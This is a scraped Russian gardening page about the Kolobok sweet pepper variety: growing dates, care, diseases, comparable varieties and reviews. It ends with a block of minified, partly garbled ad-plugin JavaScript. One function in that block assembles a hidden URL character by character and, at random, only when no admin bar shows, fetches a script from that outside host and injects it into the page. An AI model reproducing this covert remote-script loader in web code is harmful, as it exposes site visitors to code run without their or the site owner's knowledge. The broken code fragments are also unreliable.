Колобок толстостенный сорт: на срезе плода невооруженным глазом видно, что толщина мякоти вместе с кожурой составляет около 1 см. В среднем эти показатели составляют 8-9 мм.

Мякоть очень сочная, мясистая, сладкая с выраженным перечным ароматом. Плоды компактные, весом 90 гр., отдельные экземпляры могут набирать массу до 160 гр.

Томатовидные перцы употребляют в свежем виде, используют для салатов, цельноплодного консервирования и фаршируют.

Пищевая ценность овоща заключается в повышенном содержании аскорбиновой кислоты.

Благодаря толстостенности и прочной шкурке Колобок долго хранится в домашних условиях и хорошо переносит длительные перевозки.

Сорт внесен в Госреестр в 1983 году с районированием по Северо-Кавказскому региону. Родиной культивара является Молдова.

Сроки посева и особенности ухода

При выращивании перца Колобок в открытом грунте рекомендованные производителем сроки посева семян на рассаду – 10-20 марта. На грядку сеянцы переносят при достижении возраста в 50-60 дней. Эти сроки приходятся на 10-20 мая. К этому времени должна устояться температура не менее +15 градусов днем и +12 градусов ночью.

Если перец будет выращиваться в теплице, то посев осуществляют в конце февраля – первых числах марта.

Уход за рассадой в домашних условиях включает в себя стандартные мероприятия: поливы каждые 3-4 дня, рыхление почвы, поддержание температуры от +23 до +25 градусов, хорошее освещение.

Благодаря компактности кустов культивар подходит для загущенной посадки. Рекомендованная схема размещения растений на постоянном месте – 40 на 60 см. На кв. м. допустимо высаживать до 5 растений.

Выращивать культуру можно на месте, где до этого росли морковь, свекла, капуста, тыквенные, бобовые (кроме фасоли). Недопустимыми «соседями» перца считаются огурцы.

Колобок, как и другие сорта болгарского перца, любит не закислённые воздушные почвы, заправленные компостом или перепревшим навозом. Он нуждается в регулярных поливах (каждые 3 дня), прополках и рыхлении грунта. В теплицах посадки рекомендуется мульчировать соломой. Мульча поможет удержать влагу в почве и сдержит рост сорняков.

Сорт отзывчив на внесение удобрений, любит тепло и солнце. Недостаток ультрафиолета и отсутствие подкормок может сказаться на урожайности и размерах плодов. В качестве органических удобрений используют настой куриного помета, из минеральных лучше всего подходит нитрофоска.

Уход за перцами также включает удаление нижних листочков и всех пасынков до первой развилки.

Плоды рекомендовано снимать с растений в стадии технической спелости, чтобы те не оттягивали на себя питание и не тормозили развитие новых завязей.

Болезнеустойчивость

Сладкий перец сорта Колобок имеет хорошую устойчивость к таким болезням, как вершинная гниль, вертициллёз, вирус табачной мозаики. Иногда может поражаться антракнозом. Не имеет иммунитета по отношению фузариозу.

Профилактика заболеваний включает соблюдение севооборота, регулярную прополку сорняков или мульчирование почвы и обработку растений фунгицидами.

Колобок может подвергаться нападению таких вредителей, как тля, белокрылка, слизни и паутинный клещ. Кусты необходимо регулярно осматривать на предмет наличия паразитов и своевременно обрабатывать растения инсектицидами при первых признаках поражения.

Достоинства и недостатки

По отзывам и характеристике перца Колобок у сорта можно выделить несколько достоинств:

  • ранняя отдача урожая;
  • дружное плодоношение;
  • отличный перечный вкус плодов
  • толстостенность, красивые формы;
  • болезнеустойчивость;
  • хорошая лежкость и транспортабельность
  • универсальное назначение в кулинарии.

Среди недостатков огородники выделяют среднюю урожайность и уязвимость по отношению к вертициллёзному увяданию.

Похожие сорта

Перец Колобок по характеристике и описанию сорта имеет сходства со следующими культиварами:

Бублик – раннеспелый перец, отдающий плоды на 105-110 день после появления всходов. Куст раскидистый высотой до 70 см. Томатовидные плоды ярко-красной окраски достигают в весе от 80 до 100 гр. Как и Колобок, имеют универсальное назначение. Идеальны для фарширования. Урожайность с кв. м. доходит до 5,5 кг. Сорт устойчив к вертициллёзному увяданию.

Рубиновый также относится к гогошарному типу перца. В отличие от Колобка этот культивар созревает позднее. Отдача урожая происходит спустя 160 дней после начала вегетации. На кусте созревают крупные толстостенные плоды, вес одного экземпляра доходит до 150 гр. С 1 кв. м. собирают 3-3,3 кг овощей. К бактериальному увяданию перец имеет среднюю устойчивость.

Оленька – раннеспелый сорт от агрофирмы Аэлита. Внесен в Госреестр по РФ. По характеристикам во многом идентичен Колобку. Масса темно-красных плодов при биологической зрелости в среднем составляет 90 гр., толстостенность на уровне 8 мм, число гнезд – 3-4 шт. Куст компактный, малооблиственный высотой до 50 см. Отличается высокой урожайностью под пленочными укрытиями, которая может составлять при правильной агротехнике 9 кг с 1 кв. м.

Золотая Тамара относится к среднеспелым сортам. Урожай собирают через 135-140 дней. Кусты перца относительно небольшие, высотой 45-60 см. Томатовидные, толстостенные плоды золотисто-желтого окраса набирают массу до 150-200 гр.

Солнышко имеет во многом схожие характеристики с жёлтым Колобком. Перцы гогошарного типа в среднем весят 70-100 гр. Наделены толстой стенкой, мясистой, сочной и ароматной мякотью с повышенным содержанием витамина C. Куст у растения компактный, высотой от 35 до 50 см. Растение отдает плоды через 110-120 дней после начала вегетационного периода. Сорт устойчив к вертициллёзу и альтернариозу.

Отзывы огородников

«Сажаю Колобок уже не первый год. Выращиваю в теплице. Этот перец поспевает одним из самых первых. Люблю этот сорт прежде всего за его вкус и красивые формы. Он очень хорош в свежем виде, а для фаршировки я использую только его».

«Мне очень нравятся перцы гогошарного типа за необычность плодов. На своем участке отдаю предпочтение таким сортам, как Колобок и Солнышко. Они похожи между собой, созревают примерно в одинаковое время, но по урожайности первый уступает. Эти перцы хороши не только для приготовления блюд, фаршировки и консервирования. Моя семья очень любит есть их в свежем виде».

Пётр (Московская обл.):

«Колобок любит свет и тепло. Недостаток солнечного света для него настоящая беда. В этом году перцы не удались, получились более мелкими по сравнению с прежними сезонами. Грешу на большое количество пасмурных дней и дождливую погоду. В следующем сезоне попробую посадить сорт под пленочными укрытиями, посмотрим, что выйдет».

Сладкий сорт перца Колобок – один из самых популярных среди отечественных огородников. Его ценят за относительную неприхотливость в уходе, экономию места при высадке на участок, необычные плоды томатного вида и насыщенный перечный вкус. При правильной агротехнике культивар порадует крупными перцами с дружной отдачей урожая.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};